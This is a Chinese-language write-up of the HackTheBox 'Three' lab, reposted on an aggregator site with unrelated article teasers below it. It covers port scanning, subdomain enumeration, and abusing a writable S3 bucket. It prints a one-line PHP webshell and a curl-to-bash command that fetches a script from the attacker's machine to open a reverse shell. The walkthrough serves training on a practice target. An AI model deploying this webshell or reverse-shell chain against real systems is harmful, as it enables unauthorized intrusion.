HTB：Three[WriteUP]

HTB：Three[WriteUP]

news2024/9/30 1:47:24

使用OpenVPN连接并启动机器

1.How many TCP ports are open?

使用nmap对靶机进行扫描：nmap -sV 10.129.233.85

可见仅开启了 22、80 共2个端口

2.What is the domain of the email address provided in the "Contact" section of the website?

直接对靶机进行访问：http://10.129.233.85

在联系方式一栏找到域名：thetoppers.htb

3.In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

这是常识题：/etc/hosts

4.Which sub-domain is discovered during further enumeration?

注：这里我根据官方的WP使用gobuster进行子域名枚举没能爆破出来

执行命令：gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

如果Kali没安装selicsts字典，执行命令apt install seclists安装后再执行上述命令即可

官方WP是通过该字典爆破出来的：s3.thetoppers.htb

5.Which service is running on the discovered sub-domain?

将靶机IP写入hosts文件中，令该域名进行DNS本地解析：

echo "10.129.233.85 s3.thetoppers.htb" | sudo tee -a /etc/hosts

使用浏览器访问http://s3.thetoppers.htb

只显示{"status": "running"}字样

结合域名前的s3，通过Google搜索可知这是个Amazon S3服务

6.Which command line utility can be used to interact with the service running on the discovered sub-domain?

要与Amazon S3进行交互，我们可以使用工具awscli

在Kali上使用apt install awscli命令进行安装

7.Which command is used to set up the AWS CLI installation?

安装AWS CLI执行命令：aws configure

8.What is the command used by the above utility to list all of the S3 buckets?

列出全部存储桶命令：aws s3 ls

但实际上我们这里需要列出 s3.thetoppers.htb 该域的全部存储桶

所需执行命令为：aws --endpoint=http://s3.thetoppers.htb s3 ls

再从指定存储桶中列出所有对象：aws --endpoint=http://s3.thetoppers.htb s3 ls thetoppers.htb

9.This server is configured to run files written in what web scripting language?

通过存储桶中的对象，我们可以看到index.php文件，所以可以确定该Web脚本语言为php

Submit root flag

考虑到该服务使用PHP进行编写，并且允许我们对该桶进行增删改查

编写Webshell：<?php system($_GET[cmd]); ?>，保存至shell.php并上传至桶中

接下来尝试用GET方法构造URL中的cmd参数进行命令执行

使用ls命令逐级查找flag的位置，最终在上一级目录找到了flag.txt

接下来尝试利用webshell进行打反弹shell

本地写一个shell.sh文件来获得一个反弹shell，再使用nc持续监听

接着在shell.sh同目录下启动http.server服务，随便选择开启一个闲置端口

命令：python -m http.server 6666

在靶机Webshell中，通过curl访问本地shell.sh文件进行反弹shell

命令：curl 10.10.16.22:6666/shell.sh|bash

接着http服务端和nc监听端都能收到响应

http.server：

nc：

通过sh回到上一级目录，直接cat flag.txt

flag：a980d99281a28d638ac68b9bf9453c2b

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2178330.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

探索自闭症寄宿学校：为孩子的未来铺设坚实基石

探索自闭症寄宿学校：为孩子的未来铺设坚实基石

在自闭症儿童教育的广阔天地中，寄宿学校以其独特的教育模式和全方位的关怀体系，为这些特殊孩子提供了一个安全、稳定且充满爱的成长环境。这些学校不仅关注孩子们的学习与康复，更致力于培养他们独立生活的能力，为他们的未来铺设坚…

阅读更多...

java 解析excel （网络资源）

java 解析excel （网络资源）

在Java中解析Excel文件，可以使用Apache POI库。以下是一个简单的例子，展示如何使用Apache POI读取一个Excel文件（假设为.xlsx格式）的内容。首先，确保你的项目中包含了Apache POI的依赖。如果你使用Maven，…

阅读更多...

【muduo源码分析】「阻塞」「非阻塞」「同步」「异步」

【muduo源码分析】「阻塞」「非阻塞」「同步」「异步」

欢迎来到破晓的历程的博客 ⛺️不负时光，不负己✈️ 文章目录引言何为「muduo库」安装muduo库阻塞、非阻塞、同步、异步数据准备数据准备引言从本篇博客开始，我会陆续发表muduo库源码分析的相关文章。感谢大家的持续关注！！…

阅读更多...

ORM的了解

ORM的了解

什么是ORM？为什么要用ORM？-CSDN博客 C高级编程（99）面向资源的设计思想（ORM）_c orm-CSDN博客 ORM:Object-Relational-Mapping 对象关系映射 -------------------------- 我想对数据库中的表A进行增删改…

阅读更多...

International Journal of Metalcasting是否值得投稿?

International Journal of Metalcasting是否值得投稿?

International Journal of Metalcasting期刊如何? 投稿快不快?这是一本材料科学3区期刊，冶金工程3区期刊，是美国铸造协会(American Foundry Society)创办，Springer International Publishing出版的期刊，旨在促进金属铸造领域的…

阅读更多...

电脑使用adb工具连接手机，全文完整教程

电脑使用adb工具连接手机，全文完整教程

目录前言正文前置条件打开开发者选项打开usb调试连接步骤 1、保证电脑和手机在同一网络下 2、打开电脑cmd窗口。 3、在cmd窗口输入adb connect手机IP地址 4、验证扩展问题解决由于连接方在一段时间后没有正确答复或连接的主机没有反应，连接尝…

阅读更多...

D16【python接口自动化学习】-python基础之内置数据类型

D16【python接口自动化学习】-python基础之内置数据类型

day16 字典的常见操作（下） 学习日期：20240923 学习目标：内置数据类型--25 常见常新：字典的常见操作（下） 学习笔记： 字典的高级用法 # 字典的高级用法 # setdefaul函数 tom_mail …

阅读更多...

CHI trans简介--Retry

CHI trans简介--Retry

总目录： CHI协议简读汇总-CSDN博客 Retry trans flow requester发送一个请求，该请求没有protocol credit(P-Credit); 也就是说，该请求不保证completer一定能够接收该trans;completer返回一个retry resp, RetryAck, 给到Requester;completer再…

阅读更多...

关于GPIO输入模式的配置选择

关于GPIO输入模式的配置选择

GPIO（通用输入输出）口是嵌入式系统中的重要组成部分，输入模式使得微控制器能够与外部世界进行交互。本文将探讨GPIO输入模式中的浮空输入、上拉输入和下拉输入的配置、使用场景及注意事项，并提供一些决策指导，帮助读者…

阅读更多...

技术速递｜加入 .NET 智能组件生态系统

技术速递｜加入 .NET 智能组件生态系统

作者：Daniel Roth - 首席产品经理排版：Alan Wang .NET 智能组件是一组示例嵌入式 UI 组件，使得在应用中轻松添加 AI 启用的功能变得更加简单，例如从剪贴板数据自动填写表单、智能文本补全以及语义搜索等场景。.NET 智能组件演示了…

阅读更多...

【STM32开发环境搭建】-3-STM32CubeMX Project Manager配置-自动生成一个Keil(MDK-ARM) 5的工程

【STM32开发环境搭建】-3-STM32CubeMX Project Manager配置-自动生成一个Keil(MDK-ARM) 5的工程

目录 1 KEIL(MDK-ARM) 5 Project工程设置 2 MCU和嵌入式软件包的选择 3 Code Generator 3.1 STM32Cube Firmware Library Package 3.2 Generated files 3.3 HAL Settings 3.4 Template Settings 4 Advanced Settings 5 自动生成的KEIL(MDK-ARM) 5 Project工程目录结…

阅读更多...

【hot100-java】【划分字母区间】

【hot100-java】【划分字母区间】

R9-贪心算法篇印象题： 我记得，先用字典记录每个字母出现的下标，取出首个字母的下标j,然后我们for循环遍历一次，如果该下标大于 j，就要变化新的首字母，如果相等就说明一个字符串完成，如果小于就…

阅读更多...

自动蛋鸡饲料机组：粉碎搅拌一步到位

自动蛋鸡饲料机组：粉碎搅拌一步到位

蛋鸡养殖如何科学、高效地喂养蛋鸡，直接关系到蛋品的产量与质量。一款让养殖户赞不绝口的“黑科技”——蛋鸡饲料粉碎搅拌机组！ 传统的蛋鸡饲料加工方式，往往依赖人工或简单机械，不仅效率低下，还难以保证饲料的均匀度…

阅读更多...

MySQL 5.8 Performance Schema 配置详解

MySQL 5.8 Performance Schema 配置详解

MySQL 5.8 Performance Schema 配置详解 MySQL 的 Performance Schema 是一个用于监控和优化数据库性能的子系统，专门用来收集 MySQL 服务器的运行情况和性能指标。它的核心原理是通过“生产者”和“消费者”的概念来采集和存储数据库中的事件信息，帮助…

阅读更多...

第十四周周报：Transformer for CV

第十四周周报：Transformer for CV

目录摘要 Abstract 一、Swin Transformer 1.1 输入 1.2 Patch Partition 1.3 Linear Embedding 1.4 Patch Merging 1.5 Swin Transformer Block 1.6 代码二、MLP-Mixer 2.1 网络模型整体结构 2.2 Mixer Layer 2.3 MLP 总结摘要本篇博客介绍了采用类似于卷积…

阅读更多...

MySQL篇（leetcode刷题100（查询））（二）（持续更新迭代）

MySQL篇（leetcode刷题100（查询））（二）（持续更新迭代）

目录一、普通查询 1. 可回收且低脂的产品（简单） 1.1. 题目描述 1.2. 解题思路 2. 寻找用户推荐人（简单） 2.1. 题目描述 2.2. 解题思路 3. 大的国家（简单） 3.1. 题目描述 3.2. 解题思路 4. 文章浏…

阅读更多...

【JavaEE初阶】文件IO(下)

【JavaEE初阶】文件IO(下)

欢迎关注个人主页：逸狼创造不易，可以点点赞吗~ 如有错误，欢迎指出~ 目录文件内容操作打开关闭文件文件描述符表字节流读文件写文件字符流读文件写文件 Scanner 示例一:通过scanner读取文件中的数字示例二:扫描指定⽬录示例三:实…

阅读更多...

JUC第23讲：Java线程池最佳实践

JUC第23讲：Java线程池最佳实践

JUC第23讲：Java线程池最佳实践本文是JUC第23讲，先介绍为什么使用线程池；然后结合实际业务，讲解如何使用线程池，以及使用过程中踩过的坑。 1、Java线程池概述 1.1、什么是线程池？ 线程池是一种用于管理和…

阅读更多...

彩虹易支付最新版源码及安装教程（修复BUG+新增加订单投诉功能）

彩虹易支付最新版源码及安装教程（修复BUG+新增加订单投诉功能）

该系统也没版本号，此版本目前是比较新的版本，增加了订单投诉功能，和一个好看的二次元模板。此版本是全开源版，无一处加密文件,系统默认是安装后是打不开的， 本站特别修复了BUG文件，在PHP7.4环境下也没问…

阅读更多...

数据结构和算法之树形结构(4)

数据结构和算法之树形结构(4)

文章出处：数据结构和算法之树形结构(4) 关注码农爱刷题，看更多技术文章！！！ 六、红黑树(接前篇) 红黑树是为了弥补AVL树在大规模频繁增删节点场景下性能不理想而设计出来的一种平衡二叉查找树。红黑树不是一种严…

阅读更多...

推荐文章

最新文章